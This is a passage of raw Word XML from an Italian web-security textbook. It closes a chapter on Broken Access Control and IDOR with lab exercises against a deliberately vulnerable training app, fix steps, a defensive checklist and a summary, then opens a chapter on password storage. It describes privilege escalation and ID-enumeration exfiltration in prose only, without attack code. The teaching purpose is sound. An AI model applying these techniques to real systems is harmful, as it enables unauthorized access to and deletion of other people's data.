      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">modificando il tuo stesso ruolo (anteprima del Mass Assignment del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cancellazione non autorizzata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: trova un endpoint DELETE su una risorsa che ti permetta di cancellare risorse di altri utenti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="297"/>
    <w:bookmarkStart w:id="298" w:name="correzione-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correzione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ogni vulnerabilità trovata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identifica nel codice di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il punto in cui manca il controllo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applica la correzione (filtro ownership nella query, oppure controllo esplicito)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riprova l’attacco: deve restituire 404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica che il comportamento legittimo continui a funzionare (l’utente legittimo deve ancora vedere/modificare le proprie risorse)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confronta il codice corretto con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-secure/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="298"/>
    <w:bookmarkStart w:id="299" w:name="estensione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estensione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">audit log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che registra ogni accesso a risorse. Per ogni richiesta a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, salva in una tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(timestamp, utente_id, ip_sorgente, risorsa, esito). Aggiungi una pagina amministrativa che mostri gli ultimi 100 eventi. Ogni utente con più di 50 accessi negati in 10 minuti viene marcato come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sospetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e il suo account temporaneamente bloccato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="299"/>
    <w:bookmarkEnd w:id="300"/>
    <w:bookmarkStart w:id="301" w:name="X1500f0cf0145945f04c2497fb87a0df927de8ce"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="sec_6_13"/>
      <w:r>
        <w:t xml:space="preserve">6.13 Checklist operativa Broken Access Control / IDOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Distinguere autenticazione e autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il controllo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è loggato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non è mai sufficiente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Per ogni endpoint che riceve un ID di risorsa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, verifica esplicita di proprietà</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Filtro nella query stessa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando possibile (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id=? AND utente_id=?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ID utente sempre dalla sessione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mai dal body né dall’URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Per gli endpoint di scrittura/cancellazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: controllo ridondante (anche dopo la query, verifica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.rowcount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">404 per dati sensibili anche solo all’esistenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 403 per casi più espliciti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mass assignment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: whitelist hard-coded dei campi modificabili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint admin/staff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in domini separati o con autorizzazione doppia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">UUID v4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invece di ID sequenziali per risorse esposte pubblicamente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Rate limiting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sugli endpoint che restituiscono dati sensibili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Audit log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">centralizzato di accessi e tentativi falliti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test di sicurezza specifici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in CI: utente A tenta di accedere a risorse di utente B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Code review focalizzato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il revisore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">deve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trovare il controllo di autorizzazione, altrimenti rifiuta il merge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="301"/>
    <w:bookmarkStart w:id="302" w:name="riepilogo-del-capitolo-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="524" w:name="sec_6_14"/>
      <w:r>
        <w:t xml:space="preserve">6.14 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la categoria #1 della OWASP Top 10 da otto anni consecutivi (2017, 2021, 2025). Il problema più persistente e diffuso della sicurezza applicativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La causa è una confusione fondamentale fra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autenticazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chi sei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hai il permesso di accedere a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">questa specifica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risorsa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Verificare solo che l’utente sia loggato non basta mai.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Direct Object Reference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è la manifestazione più comune: cambiando un ID nell’URL si accede a risorse che non ci appartengono.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’IDOR si trasforma da curiosità a disastro tramite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">enumerazione automatica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 15 righe di Python esfiltrano l’intero database. Casi reali: First American (885 milioni di documenti), Optus (9,8 milioni di clienti), T-Mobile (37 milioni).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">varianti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di IDOR includono: ID numerici, UUID, username nel path, ID nel body, mass assignment, path traversal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">difesa principale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">controllo di proprietà server-side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in ogni endpoint che riceve un identificatore. Implementabile come filtro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella query, controllo esplicito post-lettura, o decoratore riutilizzabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difese aggiuntive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: UUID casuali, rate limiting, audit log, test di sicurezza specifici, code review focalizzato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IDOR su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">scritture e cancellazioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è ancora più grave della lettura: non viola solo la privacy, distrugge o modifica dati altrui.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai esteso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un endpoint vulnerabile, hai esfiltrato l’intero database delle fatture, hai applicato la correzione minima (un filtro nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), hai verificato che lo script di esfiltrazione restituisce solo le risorse legittime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Password e crittografia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vediamo perché MD5 è morto da vent’anni eppure si trova ancora in produzione, perché Base64 non è cifratura, cosa è il salt, e come bcrypt risolve in 5 righe di codice un problema che ha causato la fuga di centinaia di milioni di password negli ultimi vent’anni. È OWASP A04 — Cryptographic Failures.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="302"/>
    <w:bookmarkEnd w:id="303"/>
    <w:bookmarkStart w:id="345" w:name="capitolo-7-password-e-crittografia"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="525" w:name="ch_7"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 7 — Password e crittografia</w:t>
      </w:r>
      <w:bookmarkEnd w:id="525"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Capitoli 3 (database), 4 (OWASP A04), 5 (SQL Injection — userai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3 ore con il laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel maggio 2012 LinkedIn ha subito un breach:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">117 milioni di password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono state esposte. Erano memorizzate hashate con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-1 senza salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
